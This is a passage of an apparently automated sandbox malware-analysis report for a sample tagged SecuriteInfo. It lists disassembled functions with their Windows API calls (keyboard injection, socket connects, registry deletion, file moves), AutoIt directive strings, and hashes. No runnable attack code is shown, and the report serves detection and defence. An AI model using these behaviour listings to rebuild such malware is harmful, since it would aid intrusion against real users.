                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: a2c01c1709806ecd8bbd11ba4cbe5dc1db9516cf77f51e2dfed1701f8491a726
                    • Instruction ID: 85e6c23cc82a7fcb866cb95b9c3ff9431b4f96f52857aa0b1fa4b3926a90d6b5
                    • Opcode Fuzzy Hash: a2c01c1709806ecd8bbd11ba4cbe5dc1db9516cf77f51e2dfed1701f8491a726
                    • Instruction Fuzzy Hash: 75619C75A00619DFCF14EF64C484AAEBBF6FF48310B14846DE85AAB351CB79AD44CB90
                    Function 007B145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 007B149C
                    • GetKeyboardState.USER32(?), ref: 007B14B1
                    • SetKeyboardState.USER32(?), ref: 007B1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                    • Instruction ID: 5b77b59477580115de716d562704770bd8734c80b02b3b3333d2c7641269c389
                    • Opcode Fuzzy Hash: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                    • Instruction Fuzzy Hash: 5151E2A0A047D53EFB3642348C69BFA7FA95F46304F8C8589E1D6468C2C69CEC94D750
                    Function 007B1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 007B12B5
                    • GetKeyboardState.USER32(?), ref: 007B12CA
                    • SetKeyboardState.USER32(?), ref: 007B132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                    • Instruction ID: 2572410b1f61a91d9c07ef1d5d459b07085f37cf65b2eb65085b3f56d681e335
                    • Opcode Fuzzy Hash: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                    • Instruction Fuzzy Hash: 5951D3A0A046D57DFB3287248C65BFABFE96F06300FC88589E1D5878C2E799EC94D750
                    Function 007B589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: cde44621e81cad0f8017312c1454812c5935abbe2de65e1787ef29e44735efd6
                    • Instruction ID: 1acd9e7510033ccf0a469828b310e6b757d5a3fd38fe5b579e69fd71ac188baa
                    • Opcode Fuzzy Hash: cde44621e81cad0f8017312c1454812c5935abbe2de65e1787ef29e44735efd6
                    • Instruction Fuzzy Hash: 8F416165C20628B6CF10EBB4888EACF77A8AF05750F50C956E51CE3122F738E755C7A9
                    Function 007ADA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007ADAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007ADB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007ADB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,~$DllGetClassObject
                    • API String ID: 753597075-463960871
                    • Opcode ID: e5f36c4e5f23f97eb729c99caede79efbb09d248fe1be38537a78ab9ed0b8fb3
                    • Instruction ID: 4a6f1f6f5cd0ec4484fd1fc4d9cf633d31f7cd440b9b86139ff6a12e8cfcb51d
                    • Opcode Fuzzy Hash: e5f36c4e5f23f97eb729c99caede79efbb09d248fe1be38537a78ab9ed0b8fb3
                    • Instruction Fuzzy Hash: 954194B1601208DFDB25CF54C884A9A7BB9EF89710F1582AEFD069F205D7B9DD40DBA0
                    Function 007B38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 007B38F3
                    • _wcscmp.LIBCMT ref: 007B390F
                    • MoveFileW.KERNEL32(?,?), ref: 007B3927
                    • _wcscat.LIBCMT ref: 007B396F
                    • SHFileOperationW.SHELL32(?), ref: 007B39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                    • Instruction ID: b51c955f2ca7fdc65c56485e9e639007f4312d8744aa05ad0c0dfd63b589a8c2
                    • Opcode Fuzzy Hash: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                    • Instruction Fuzzy Hash: 8541827240C3449ACB51EF64C485ADFB7E8AF88344F00492EF49AC3152EA7CE68DC752
                    Function 007D7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007D7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D75C0
                    • IsMenu.USER32(?), ref: 007D75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D7620
                    • DrawMenuBar.USER32 ref: 007D7633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                    • Instruction ID: ca5a0917ecdf7620021c71a220de3ccb246a32b5dda7d51c41470d99e71405a8
                    • Opcode Fuzzy Hash: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                    • Instruction Fuzzy Hash: E1411775A05609EFDB14DF54E884E9ABBB8FF04314F08812AE95697350E735ED50CF90
                    Function 007D122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007D125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D1286
                    • FreeLibrary.KERNEL32(00000000), ref: 007D133D
                      • Part of subcall function 007D122D: RegCloseKey.ADVAPI32(?), ref: 007D12A3
                      • Part of subcall function 007D122D: FreeLibrary.KERNEL32(?), ref: 007D12F5
                      • Part of subcall function 007D122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007D1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 007D12E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                    • Instruction ID: 4e0a5b580da4b05b18a9d662243224a8730d4be62428b739d887aeadc9124b90
                    • Opcode Fuzzy Hash: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                    • Instruction Fuzzy Hash: 82312BB1901109BFDB149B90DC89EFEB7BCEF08300F40416AE512E2251EA79AE459BA4
                    Function 007D653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007D655B
                    • GetWindowLongW.USER32(011E53C0,000000F0), ref: 007D658E
                    • GetWindowLongW.USER32(011E53C0,000000F0), ref: 007D65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007D65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007D661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007D6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007D664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                    • Instruction ID: caedf365965d6ef8cd78448c29b3946fd62065d467eac9ec6ee1873c1fa77958
                    • Opcode Fuzzy Hash: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                    • Instruction Fuzzy Hash: 7B310230605210AFDB20CF18EC84F553BF5FB4A310F1881AAF5568B3B6CB69E8A0DB51
                    Function 007C6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 007C652A
                    • WSAGetLastError.WSOCK32 ref: 007C6534
                    • closesocket.WSOCK32(00000000), ref: 007C655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                    • Instruction ID: 1e38b10d83f8ef84bb4ec43001d7a63ac75b43c21afc80cca6e28f6b9e8d7376
                    • Opcode Fuzzy Hash: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                    • Instruction Fuzzy Hash: 2D31A431600118EBDB109F24DC89FBE77B9EB44721F04802DFD06A7291DB78AD04CB62
                    Function 007AE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE120
                    • SysAllocString.OLEAUT32(00000000), ref: 007AE123
                    • SysAllocString.OLEAUT32 ref: 007AE144
                    • SysFreeString.OLEAUT32 ref: 007AE14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007AE167
                    • SysAllocString.OLEAUT32(?), ref: 007AE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: 92dd7230354f0471084c81950217a23d02cfc6842aaed507068ee0e3c2969c39
                    • Instruction ID: 492d5e8b05a9b60799595e561beead48ccc0f6baae7fb4b21a2b612753f8a352
                    • Opcode Fuzzy Hash: 92dd7230354f0471084c81950217a23d02cfc6842aaed507068ee0e3c2969c39
                    • Instruction Fuzzy Hash: FA215335605118AFDB10AFA8DC88DAB77ECEB4A760B50C236F955CB260DA78DC41CF64
                    Function 007AFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 547a4c7d6093c7c3aa9829197ee99cd90365fe0a0a712a55f343d906bd121574
                    • Instruction ID: e11f40d85954d8fa646d76c1048b93704782e0b90c95a94cb9db8e87f1f4bc34
                    • Opcode Fuzzy Hash: 547a4c7d6093c7c3aa9829197ee99cd90365fe0a0a712a55f343d906bd121574
                    • Instruction Fuzzy Hash: C4219A72200650A6D634A675DC16FA7739CDF96350F108235F88986182EB5C9D82D2B4
                    Function 007D783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                      • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                      • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007D78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007D78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007D78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007D78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                    • Instruction ID: fd6bc40a31d845ede7355fc6835399d7afa5101ea3387e5f8ad3a58894250847
                    • Opcode Fuzzy Hash: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                    • Instruction Fuzzy Hash: 5211B2B2110219BFEF159F60CC85EE77F6DEF08798F018115FA04A2190DB769C21EBA4
                    Function 007741C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00774292,?), ref: 007741E3
                    • GetProcAddress.KERNEL32(00000000), ref: 007741EA
                    • EncodePointer.KERNEL32(00000000), ref: 007741F6
                    • DecodePointer.KERNEL32(00000001,00774292,?), ref: 00774213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                    • Instruction ID: f2aff5a5587cf137f6f821de3767f326d4210f9ce0e7dfb2411e42ce0347d581
                    • Opcode Fuzzy Hash: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                    • Instruction Fuzzy Hash: 89E01AB0692344BEEF206BB1EC0DB543AA8BB24742F51D425F916D50A0DBBE40928F04
                    Function 0077429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007741B8), ref: 007742B8
                    • GetProcAddress.KERNEL32(00000000), ref: 007742BF
                    • EncodePointer.KERNEL32(00000000), ref: 007742CA
                    • DecodePointer.KERNEL32(007741B8), ref: 007742E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: 4d84bc07b4c6f33343503519e624323da84c78b8a9af7b47a7650800c53a2d8b
                    • Instruction ID: 06ce0cebd6c8be52bcbd664678aa6ab291010f3b797652cdaa1f2de6edacdc2c
                    • Opcode Fuzzy Hash: 4d84bc07b4c6f33343503519e624323da84c78b8a9af7b47a7650800c53a2d8b
                    • Instruction Fuzzy Hash: 8AE0B6B8682305BBEB119B61ED0DF843BB8BB24782F15D026F112E10A5CBBD4561CA18
                    Function 007B675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                    • Instruction ID: 6c2b998bbf63f20502357cda86acc6054873ac67d7f32004635076aeeec6d845
                    • Opcode Fuzzy Hash: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                    • Instruction Fuzzy Hash: 69619B3050069ADBDF11EF24C88AFFE37A8AF44308F444559FE5A5B292DB7CA945CB90
